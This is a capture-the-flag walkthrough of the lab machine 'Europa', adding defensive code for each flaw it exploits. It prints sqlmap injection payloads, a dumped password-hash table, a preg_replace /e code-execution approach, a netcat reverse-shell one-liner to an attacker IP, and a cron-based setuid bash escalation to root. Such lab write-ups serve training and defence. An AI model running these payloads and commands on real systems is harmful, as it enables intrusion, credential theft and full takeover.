Europa

Recon

Let’s explore Europa. The web root looks a bit like the Apache default page, if you ask me.

$nmap -p- -A 10.129.166.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 16:10 UTC
Nmap scan report for 10.129.166.9
Host is up (0.034s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
|   256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
|_  256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Not valid before: 2017-04-19T09:06:22
|_Not valid after:  2027-04-17T09:06:22
|_http-title: Apache2 Ubuntu Default Page: It works
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So I added europacorp.htb to dnsmasq and then tried the newly found https://admin-portal.europacorp.htb, which gave me a login page.

I ran sqlmap against it and got a 302 redirect to https://admin-portal.europacorp.htb/dashboard.php. Going there, we are simply logged in and can use the whole site. We also get a dump of the users database.

custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 408 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: email=test@test.com' RLIKE (SELECT (CASE WHEN (6890=6890) THEN 0x7465737440746573742e636f6d ELSE 0x28 END))-- tdBn&password=123

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: email=test@test.com' AND GTID_SUBSET(CONCAT(0x7176626271,(SELECT (ELT(1905=1905,1))),0x71626a7871),1905)-- QaPi&password=123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=test@test.com' AND (SELECT 9800 FROM (SELECT(SLEEP(5)))zGtH)-- kcZw&password=123
---
Database: admin
Table: users
[2 entries]
+----+----------------------+----------+----------------------------------+---------------+
| id | email                | active   | password                         | username      |
+----+----------------------+----------+----------------------------------+---------------+
| 1  | admin@europacorp.htb | 1        | 2b6d315337f18617ba18922c0b9597ff | administrator |
| 2  | john@europacorp.htb  | 1        | 2b6d315337f18617ba18922c0b9597ff | john          |
+----+----------------------+----------+----------------------------------+---------------+

The admin password is SuperSecretPassword!
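To see why the login fell to sqlmap and what the fix looks like, here is an added example that is not part of the original write-up or the box's own code. It uses an in-memory SQLite database with constructed sample users (the identical unsalted MD5 hashes mirror the dump above) and contrasts a string-built query with a parameterised one; the boolean-based blind probe is written for SQLite, so it uses a CASE expression rather than MySQL's RLIKE, and all names and addresses are my own.

```python
import hashlib
import sqlite3


# Constructed sample data: two users sharing one unsalted MD5 hash, the
# same weakness the dump above exposes (identical hashes reveal identical
# passwords and make offline cracking trivial).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER, email TEXT, active INTEGER, "
        "password TEXT, username TEXT)"
    )
    weak_hash = hashlib.md5(b"constructed-example-password").hexdigest()
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "admin@example.test", 1, weak_hash, "administrator"),
            (2, "john@example.test", 1, weak_hash, "john"),
        ],
    )
    return conn


def login_vulnerable(conn, email, password):
    """Builds the WHERE clause by string formatting: whatever the user
    types is parsed as SQL, which is the bug sqlmap found."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = (
        f"SELECT username FROM users WHERE email='{email}' "
        f"AND password='{pw_hash}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, email, password):
    """Same query with bound parameters: the driver sends the values
    separately from the statement, so quotes and comment markers in the
    input are just characters inside a string."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE email=? AND password=?",
        (email, pw_hash),
    ).fetchone()
    return row[0] if row else None


# Inputs of the same shape as the sqlmap output above: a trailing '-- '
# comments out the password check, and a CASE expression is a
# boolean-based blind probe (true/false decides whether a row comes back).
BYPASS_EMAIL = "admin@example.test'-- "
BLIND_TRUE = "admin@example.test' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)-- "
BLIND_FALSE = "admin@example.test' AND (SELECT CASE WHEN (1=2) THEN 1 ELSE 0 END)-- "


def demo():
    """Run both login variants against the constructed database."""
    conn = make_db()
    return {
        "vuln_bypass": login_vulnerable(conn, BYPASS_EMAIL, "wrong"),
        "vuln_blind_true": login_vulnerable(conn, BLIND_TRUE, "wrong"),
        "vuln_blind_false": login_vulnerable(conn, BLIND_FALSE, "wrong"),
        "safe_bypass": login_safe(conn, BYPASS_EMAIL, "wrong"),
        "safe_real": login_safe(conn, "john@example.test", "constructed-example-password"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The vulnerable variant logs the attacker in without a password and leaks one bit per request through the true/false probe; the parameterised variant treats the same strings as an e-mail address that matches nobody. Replacing unsalted MD5 with a slow salted hash (bcrypt, scrypt or Argon2) is the second fix the dump calls for.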

Dashboard

The only tool available to us is an OpenVPN config generator.

"openvpn": {
        "vtun0": {
                "local-address": {
                        "10.10.10.1": "''"
                },
                "local-port": "1337",
                "mode": "site-to-site",
                "openvpn-option": [
                        "--comp-lzo",
                        "--float",
                        "--ping 10",
                        "--ping-restart 20",
                        "--ping-timer-rem",
                        "--persist-tun",
                        "--persist-key",
                        "--user nobody",
                        "--group nogroup"
                ],
                "remote-address": "ip_address",
                "remote-port": "1337",
                "shared-secret-key-file": "/config/auth/secret"
        },
        "protocols": {
                "static": {
                        "interface-route": {
                                "ip_address/24": {
                                        "next-hop-interface": {
                                                "vtun0": "''"
                                        }
                                }
                        }
                }
        }
}

When we submit any input and look at the request in Burp Suite, we can see a “pattern” parameter, probably a regex, that is used to substitute our IP address into the text.

Searching for “php replace in text with regex” leads to Stack Overflow answers about preg_replace. Looking for ways to exploit it, I found an RCE technique on hacktricks.xyz.

I was confused for a while here and tried to somehow terminate the PHP call by putting everything into the pattern field, i.e. pattern=/ip_address/e", "print('hello');", $text);. That did not work at all, but after a while I found the right way: splitting it across the parameters, just like on hacktricks.
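The underlying mistake is that the generator let the client supply the regex pattern (and, through the /e modifier, code to evaluate). As an added example that is not part of the original write-up or the box's application, this is how the substitution looks when the server owns the pattern and only accepts a validated IP address; the template text is a constructed excerpt of the config above, and the function names are my own.

```python
import ipaddress

# Constructed excerpt of the generator's template (the full one is above).
TEMPLATE = """"remote-address": "ip_address",
"interface-route": {
        "ip_address/24": {"""

PLACEHOLDER = "ip_address"  # a fixed token, never a client-supplied regex


def validate_ip(value):
    """Accept only a syntactically valid IPv4/IPv6 address; anything else
    (shell metacharacters, regex syntax, PHP code) is rejected before it
    can reach a substitution or a shell."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError as exc:
        raise ValueError(f"invalid IP address: {value!r}") from exc


def render_config(ip, template=TEMPLATE):
    """Server-side substitution: the pattern is a constant and the
    replacement is validated data, so the client controls neither the
    regex nor any evaluated code (unlike preg_replace with /e)."""
    safe_ip = validate_ip(ip)
    return template.replace(PLACEHOLDER, safe_ip)


def try_render(ip):
    """Return the rendered text, or None when the input is rejected."""
    try:
        return render_config(ip)
    except ValueError:
        return None


if __name__ == "__main__":
    print(render_config("10.10.10.5"))
    print(try_render("/ip_address/e"))  # rejected: not an IP address
```

A plain str.replace with a fixed token is enough here; if a regex were really needed, the pattern would still be a server-side constant and any user value placed inside it would go through preg_quote (PHP) or re.escape (Python) first.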

Running system('ls /home/') shows a user john. We can’t get in via SSH, so we need a reverse shell. We can copy one from InternalAllTheThings: system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.17 4242 >/tmp/f'). On the attacking host, run nc -lvnp 4242, send the request and we are in.

Let’s do the standard shell stabilisation and work towards privilege escalation to root. The user flag can be read from /home/john/user.txt.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL-Z
stty raw -echo; fg

Priv Esc

Running LinEnum, we find a cron job that runs /var/www/cronjobs/clearlogs every minute. We can’t modify it, but we can read its contents.

#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>

Looking for logcleared.sh, I realized that it does not exist.

www-data@europa:/tmp$ ls -la /var/www/cmd/             
total 8
drwxrwxr-x 2 root www-data 4096 May 17  2022 .
drwxr-xr-x 6 root root     4096 May 17  2022 ..

Let’s create one, then, with echo "chmod u+s /bin/bash" > logcleared.sh, make it executable with chmod 777 logcleared.sh and wait a minute. Then run /bin/bash -p to get root, and we are done here.
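The root cause on the privilege-escalation side is a root cron job that exec()s a path under a directory writable by www-data, where the target does not even exist. As an added example that is not part of the original write-up or the box, here is a small audit that pulls the exec() targets out of a PHP cron script and flags a missing target or a parent directory writable by group or others; the demo_layout helper builds a constructed temporary directory with the same 775 mode as /var/www/cmd above rather than touching the live system, and the function names are my own.

```python
import os
import re
import stat
import tempfile

# The cron script from the write-up, embedded here as constructed input.
CRON_SCRIPT = """#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>
"""

# String literals handed to PHP's shell-execution functions.
EXEC_RE = re.compile(r"""\b(?:exec|shell_exec|system|passthru)\(\s*['"]([^'"]+)['"]""")


def find_exec_targets(php_source):
    """Return the program path (first word) of every command literal."""
    return [m.group(1).split()[0] for m in EXEC_RE.finditer(php_source)]


def audit_target(path):
    """Findings for one path executed by a privileged cron job."""
    findings = []
    if not os.path.exists(path):
        findings.append("target missing: whoever can write the directory creates it")
    else:
        mode = os.stat(path).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append("target writable by group or others")
    parent = os.path.dirname(path)
    if os.path.isdir(parent):
        pmode = os.stat(parent).st_mode
        if pmode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append("parent directory writable by group or others")
    return findings


def audit_script(php_source, root=""):
    """Map each exec() target to its findings; root lets the audit run
    against a copy of the tree instead of the live filesystem."""
    return {t: audit_target(root + t) for t in find_exec_targets(php_source)}


def demo_layout():
    """Constructed stand-in for the box's /var/www/cmd: an empty directory
    with mode 775 and no logcleared.sh inside it."""
    root = tempfile.mkdtemp()
    cmd_dir = os.path.join(root, "var", "www", "cmd")
    os.makedirs(cmd_dir)
    os.chmod(cmd_dir, 0o775)
    return root


if __name__ == "__main__":
    for target, findings in audit_script(CRON_SCRIPT, root=demo_layout()).items():
        print(target)
        for f in findings:
            print("  -", f)
```

Both findings apply to the box: the directory's group owner is www-data, so the web shell can drop a script that root then executes. The fix is for anything run by root cron to live in a root-owned, non-group-writable directory (and for the script to exist, or the exec() call to go away).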